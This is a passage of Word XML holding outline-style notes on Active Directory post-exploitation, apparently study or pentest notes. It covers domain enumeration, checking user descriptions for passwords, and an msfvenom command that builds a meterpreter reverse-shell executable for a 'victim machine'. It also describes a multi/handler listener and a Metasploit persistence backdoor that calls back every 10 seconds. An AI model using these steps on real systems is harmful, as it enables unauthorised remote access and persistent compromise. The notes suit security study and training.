    <w:p w14:paraId="67E4FEAD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>change trusts, add or remove users, look at groups, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570B15AD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>entry point to find other users with other sensitive information on machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B7E17" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3115F0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>only way to access is to rdp into server and access server over rdp connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C23935E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Connect with RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD96EAB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration with Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7750CA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Remmina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6337D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C620083" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Windows Server Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA470E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Tools Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344B708" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>info such as users, groups, trusts, computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E8AAC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Active Directory Users and Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8A9704" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>list of users on domain as well as groups and computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D04694" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>check descriptions for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30523D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Manage Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFCA06" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>allow to add roles and features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486162D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>easily detectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570DBFEC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45889913" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24654DAA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>persistence Metasploit module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D612B7A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>backdoor service in system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDD46A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>give instant meterpreter shell if machine is ever shutdown or reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5AD255" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Generating a Payload with msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943C90A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48846D62" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">generates basic windows meterpreter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B651FE5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>transfer to victim machine using scp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11855F1F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>scp &lt;file&gt; remote_username@&lt;ip&gt;:/remote/directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449EF450" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>in msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F88EA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C044967" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80F0CC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>set LHOST and run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2B008" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847E85E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>run executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA203C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA37F94" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Run Persistence Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21622C2E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use exploit/windows/local/persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E45AB44" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>will send payload every 10 seconds in default (time is adjustable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C81F46" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5564BCE2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>this allows a backdoor to be created that is reachable using msfconsole multihandler and setting payload to windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AF1EFE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D44B78A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.harmj0y.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7041E4A0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId90" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://adsecurity.org/?page_id=1821</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AECB082" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId91" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://metasploit.help.rapid7.com/docs/about-post-exploitation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="553C31BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId92" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.pentest-standard.org/index.php/Post_Exploitation</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="014CD038" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://offsec.red/mimikatz-cheat-sheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7ADC9C6D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
